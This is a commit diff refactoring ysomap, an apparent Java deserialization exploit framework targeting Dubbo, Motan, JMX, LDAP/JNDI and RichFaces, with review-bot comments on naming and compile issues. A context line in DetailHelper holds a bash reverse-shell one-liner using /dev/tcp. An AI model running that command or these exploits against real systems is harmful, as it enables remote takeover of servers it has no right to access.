update
wh1t3p1g committed Oct 14, 2023
1 parent 01ea810 commit 0abdcf7
Showing 28 changed files with 67 additions and 205 deletions.
31 changes: 21 additions & 10 deletions cli/src/main/java/ysomap/cli/Console.java
Expand Up @@ -23,6 +23,7 @@
import ysomap.common.util.ColorStyle;
import ysomap.common.util.Logger;
import ysomap.core.serializer.SerializerTypeCodes;
import ysomap.core.util.DetailHelper;

import java.io.File;
import java.io.IOException;
Expand Down Expand Up @@ -346,7 +347,7 @@ public void set() throws Exception {
}

public void list() throws ArgumentsMissMatchException {
if (args.size() == 0) {
if (args.isEmpty()) {
Printer.printExploitsInfo(exploits.values());
Printer.printPayloadsInfo(payloads.values());
Printer.printBulletsInfo(bullets.values());
Expand Down Expand Up @@ -509,16 +510,26 @@ public void help() {
}

// 如果可选项仅有一个,那么自动设置payload或bullet
public void autoSetPayloadOrBullet(String type, Class clazz) throws Exception {
public void autoSetPayloadOrBullet(String type, Class<?> clazz) throws Exception {
List<String> candidates = Arrays.asList(Require.Utils.getRequiresFromClass(clazz));
if (candidates.size() == 1 && !candidates.get(0).equalsIgnoreCase("*") && !candidates.get(0).equalsIgnoreCase("all gadgets") && !candidates.get(0).equals("")) {
Logger.normal(String.format("Auto set %s [%s]", type, ColorStyle.makeWordRedAndBoldAndUnderline(candidates.get(0))));
List<String> list = new ArrayList<>();
list.add(type);
list.add(candidates.get(0));
args = list;
use();
}
if(candidates.size() != 1) return;

String candidate = candidates.get(0);
if(DetailHelper.ALL_PAYLOAD.equals(candidate)
|| DetailHelper.ALL_JAVA_PAYLOAD.equals(candidate)
|| DetailHelper.ALL_HESSIAN_PAYLOAD.equals(candidate)
|| DetailHelper.NO_NEED_PAYLOAD.equals(candidate)
) return;

Logger.normal(
String.format("Auto set %s [%s]", type,
ColorStyle.makeWordRedAndBoldAndUnderline(candidate)));

List<String> list = new ArrayList<>();
list.add(type);
list.add(candidate);
args = list;
use();
}

// 过滤筛选
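Review bot: The rewritten autoSetPayloadOrBullet drops the empty-string guard the old condition carried (`!candidates.get(0).equals("")`), so a class whose @Require yields a single empty name would now reach `use()` with an empty argument; if any annotation can still produce that, add `if (candidate == null || candidate.isEmpty()) return;` directly after `String candidate = candidates.get(0);`. The four sentinel comparisons that follow duplicate knowledge that belongs next to the constants; a `DetailHelper.isPlaceholder(candidate)` helper would keep the list in one place when the next sentinel is added. The method is complete within the hunk.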
2 changes: 1 addition & 1 deletion cli/src/main/java/ysomap/cli/utils/Printer.java
Expand Up @@ -47,7 +47,7 @@ public static void printSessions(String curSession, Map<String, Session> session

public static void printCandidates(String type, Class<?> clazz, boolean detail, Map<String, MetaData> dataMap){
List<String> candidates = Arrays.asList(Require.Utils.getRequiresFromClass(clazz));
if(candidates.size() > 0){
if(!candidates.isEmpty()){
String c = collect(candidates);
Logger.normal("You can choose "+type+": "+c);
if(detail){
5 changes: 5 additions & 0 deletions core/src/main/java/ysomap/core/util/DetailHelper.java
Expand Up @@ -12,6 +12,11 @@ public class DetailHelper {
"2. reverse shell: /bin/bash -i >& /dev/tcp/x.x.x.x/port 0>&1<br>" +
"3. if not work, try to encode the command. https://jackson-t.ca/runtime-exec-payloads.html<br>";

public final static String ALL_PAYLOAD = "Any Payload";
public final static String NO_NEED_PAYLOAD = "Do not need Payload";
public final static String ALL_JAVA_PAYLOAD = "Any Java Serialization Payload";
public final static String ALL_HESSIAN_PAYLOAD = "Any Hessian Serialization Payload";

public final static String BODY =
"根据effect类型填充body内容,分别如下:<br>" +
"1. default, body=command<br>" +
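Review bot: The four new constants are sentinels that the CLI compares against @Require(bullets = …) values by string equality rather than real payload names, but nothing at the declaration says so, and a payload or bullet that happened to be registered under one of these names would silently be treated as a placeholder. Add a comment above `ALL_PAYLOAD` along the lines of `// Placeholder bullet names for @Require(bullets = …); they never resolve to a real payload and Console.autoSetPayloadOrBullet skips them.` Since the comparison is by `equals`, the exact text is part of the contract and is worth saying so in that comment. The enclosing class starts before the hunk.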
92 changes: 0 additions & 92 deletions core/src/main/java/ysomap/core/util/JarHelper.java

This file was deleted.

Expand Up @@ -6,9 +6,9 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Status;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
Expand All @@ -23,7 +23,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPC2Exploit extends AbstractExploit {

Expand All @@ -47,10 +47,6 @@ public class DubboRPC2Exploit extends AbstractExploit {
@Require(name = "paramTypes", detail = "可利用的service method 参数类型列表,使用,分隔")
public String paramTypes = null;

// @NotNull
public Payload payload;
public String payloadName;

@Override
public void work() {
try {
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPC3Exploit extends AbstractExploit {

10 changes: 3 additions & 7 deletions core/src/main/java/ysomap/exploits/dubbo/DubboRPCExploit.java
Expand Up @@ -6,9 +6,9 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.hessian.NoWriteReplaceSerializerFactory;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
Expand All @@ -21,7 +21,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("dubbo rpc 反序列化漏洞")
public class DubboRPCExploit extends AbstractExploit {

Expand All @@ -33,14 +33,10 @@ public class DubboRPCExploit extends AbstractExploit {
@Require(name = "port", type = "int",detail = "目标端口")
public String port = "20880";

@NotNull
public Payload payload;
public String payloadName;

@Override
public void work() {
try {
byte[] data = generateRequest(payload.getObject());
byte[] data = generateRequest(null);
// byte[] data = generateRequest("test");
String ret = SocketHelper.send(host, Integer.parseInt(port), data, 5000);
System.out.println(ret);
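Review bot: `work()` now calls `generateRequest(null)` after the `payload` field was removed, but nothing in the hunk explains what the request carries without a payload object or shows that generateRequest tolerates a null argument; generateRequest and the remainder of `work()` lie outside the hunk, so this cannot be confirmed here. Add a comment on that line stating the intent, e.g. `// no payload object: the request framing itself is what is sent — confirm generateRequest handles null`, and delete the leftover commented-out `// byte[] data = generateRequest("test");`, which is dead code. The @Details string still advertises a deserialization exploit while the class no longer accepts a payload, so the description may need updating to match. The `try` opened in `work()` closes outside the hunk.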
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.core.util.ClassFiles;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.HTTPHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.jmx.component.MLetPayload;
Expand All @@ -23,7 +24,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Details("Startup a SimpleHttpServer with JMX MLet.xml and MBean.jar files.\n" +
"建立一个挂载了JMX MLet.xml文件和MBean.jar文件的HTTP服务。")
public class JMXEvilMLetServer extends AbstractExploit {
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/jmx/JMXInvokeMBean.java
Expand Up @@ -3,6 +3,7 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;

Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Exploit a JMX server with specific payload.\n" +
"攻击一个JMX服务器,需要设定指定的payload。如果当前JMX服务器需要认证,则攻击前需设定用户名密码。")
public class JMXInvokeMBean extends AbstractExploit {
2 changes: 1 addition & 1 deletion core/src/main/java/ysomap/exploits/jmx/JMXMLetExploit.java
Expand Up @@ -22,7 +22,7 @@
@SuppressWarnings({"unchecked"})
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD},param = false)
@Details("针对无认证且未设置security manager的JMX服务,允许加载MLet形式外部MBean。\n" +
"通过设置exploit(JMXEvilMletServer),使得目标JMX服务载入外部MBean。\n" +
"当前exploit需要配合`JMXEvilMletServer`.")
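Review bot: The new annotation references `DetailHelper.NO_NEED_PAYLOAD`, yet this section's diffstat is one addition and one deletion, so no `import ysomap.core.util.DetailHelper;` was added here unlike the sibling exploits in this commit; unless the file already imports `ysomap.core.util.DetailHelper` (or `ysomap.core.util.*`) above the shown hunk, this will not compile. Also, `{DetailHelper.NO_NEED_PAYLOAD},param = false` lacks the space after the comma that every other changed @Require line in the commit has; write `@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)`. The annotated class declaration itself is below the hunk.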
Expand Up @@ -8,6 +8,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.LocalChainOperationInterceptor;
import ysomap.payloads.Payload;
Expand All @@ -24,7 +25,7 @@
@SuppressWarnings({"rawtypes"})
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Start up a Evil LDAP server with some payloads.\n" +
"\n" +
"建立一个LDAP服务,攻击外来连接的LDAP客户端,使得客户端对当前设置的payload进行反序列化。\n" +
3 changes: 2 additions & 1 deletion core/src/main/java/ysomap/exploits/ldap/LDAPRefListener.java
Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Logger;
import ysomap.common.util.Status;
import ysomap.common.util.Strings;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.OperationInterceptor;

Expand All @@ -20,7 +21,7 @@
*/
@Exploits
@Authors({Authors.MBECHLER})
@Require(bullets = {"evil http server"}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Dependencies({"com.sun.jndi.ldap.object.trustURLCodebase=true"})
@Details("Start up a Evil LDAP server with reference.\r\n" +
"建立一个LDAP服务,对外来连接的客户端返回构造好的reference对象。\n" +
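Review bot: Replacing `bullets = {"evil http server"}` with `DetailHelper.NO_NEED_PAYLOAD` removes the only hint in the CLI's candidate listing that this listener presumably depends on an external HTTP server hosting the class behind the returned reference; the `trustURLCodebase=true` entry in @Dependencies documents the client-side precondition but not that requirement. If @Dependencies accepts free-form strings, as `"tomcat el"` in LDAPTomcatRefListener suggests, carry the hint over: `@Dependencies({"com.sun.jndi.ldap.object.trustURLCodebase=true", "evil http server hosting the referenced class"})`. Whether the reference codebase is configured elsewhere in this file cannot be seen from the hunk.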
Expand Up @@ -11,6 +11,7 @@
import ysomap.common.util.Strings;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.exploits.ldap.component.LocalChainOperationInterceptor;

Expand All @@ -25,7 +26,7 @@
*/
@Exploits
@Authors({Authors.KINGX})
@Require(bullets = {"*"}, param = false)
@Require(bullets = {DetailHelper.NO_NEED_PAYLOAD}, param = false)
@Dependencies({"tomcat el"})
@Details("Jndi reference 依赖tomcat BeanFactory,实现EL表达式执行")
public class LDAPTomcatRefListener extends AbstractExploit {
Expand Up @@ -6,6 +6,7 @@
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.ByteHelper;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.SocketHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -21,7 +22,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {}, param = false)
@Require(bullets = {DetailHelper.ALL_PAYLOAD}, param = false)
@Details("motan rpc 反序列化漏洞")
public class MotanRPCExploit extends AbstractExploit {

Expand Up @@ -7,6 +7,7 @@
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.serializer.SerializerFactory;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.PayloadHelper;
import ysomap.core.util.ReflectionHelper;
import ysomap.exploits.AbstractExploit;
Expand All @@ -18,7 +19,7 @@

@Exploits
@Authors({Authors.WH1T3P1G, Authors.whocansee})
@Require(bullets = {"Any Java Serialization Payload"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("用于二次封装恶意序列化数据,触发二次反序列化")
public class DoubleDeserializePayloadGenerator extends AbstractExploit {

Expand Up @@ -4,6 +4,7 @@
import ysomap.common.annotation.*;
import ysomap.common.util.Status;
import ysomap.core.serializer.Serializer;
import ysomap.core.util.DetailHelper;
import ysomap.core.util.HTTPHelper;
import ysomap.exploits.AbstractExploit;
import ysomap.payloads.Payload;
Expand All @@ -16,7 +17,7 @@
*/
@Exploits
@Authors({Authors.WH1T3P1G})
@Require(bullets = {"all gadgets"}, param = false)
@Require(bullets = {DetailHelper.ALL_JAVA_PAYLOAD}, param = false)
@Details("Richfaces 反序列化漏洞exploit,CVE-2013-2165")
public class RichFacesExploit extends AbstractExploit {
